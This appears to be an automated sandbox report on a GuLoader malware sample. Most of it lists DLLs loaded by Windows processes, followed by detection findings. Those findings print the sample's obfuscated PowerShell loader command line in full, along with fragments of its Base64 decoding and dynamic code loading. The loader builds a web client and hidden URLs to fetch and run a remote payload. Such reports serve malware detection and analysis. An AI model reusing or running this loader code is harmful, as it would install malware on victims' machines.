                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeSection loaded: mswsock.dll
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2568643085.00000000074F0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: indows\System.Core.pdb>'_ source: powershell.exe, 0000000C.00000002.2576839045.0000000008440000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000013.00000003.2708032170.0000000024620000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2708153833.0000000024740000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2707520007.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000013.00000003.2707520007.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000013.00000003.2708032170.0000000024620000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2708153833.0000000024740000.00000004.00000001.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Fors", "Unsupported parameter type 00000000")
                        Yara detected GuLoader
                        Source: Yara matchFile source: 0000000C.00000002.2587424244.000000000C6DB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2587069409.0000000008A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2557862316.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2340099936.0000020FC41F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        .NET source code contains potential unpacker
                        Source: 23.3.svchost.exe.155e7abc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 23.3.svchost.exe.155e7abc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 23.3.svchost.exe.155e7abc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 23.3.svchost.exe.155e7abc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Frdigbygget)$glObal:FlJLsGRS = [sYsTEm.TExt.eNCOdING]::AsCiI.GeTsTRIng($EpocHE)$glObaL:BAttaLia=$FlJLsGRS.substRInG($VeLFUndErEDE,$aUTorIsERendeS)<#Aecidioform hollnderens Brutaliser
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Personifier $Tarentine $Patenthavere), (Ichthyized @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:varicoloreds = [AppDomain]::CurrentDomain.GetAssemblies(
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Filamentgarn252)), $Godsejernessandrous).DefineDynamicModule($Zoologiskes, $false).DefineType($Prototypevaerktoej, $Grunge, [System.Mu
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Frdigbygget)$glObal:FlJLsGRS = [sYsTEm.TExt.eNCOdING]::AsCiI.GeTsTRIng($EpocHE)$glObaL:BAttaLia=$FlJLsGRS.substRInG($VeLFUndErEDE,$aUTorIsERendeS)<#Aecidioform hollnderens Brutaliser
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
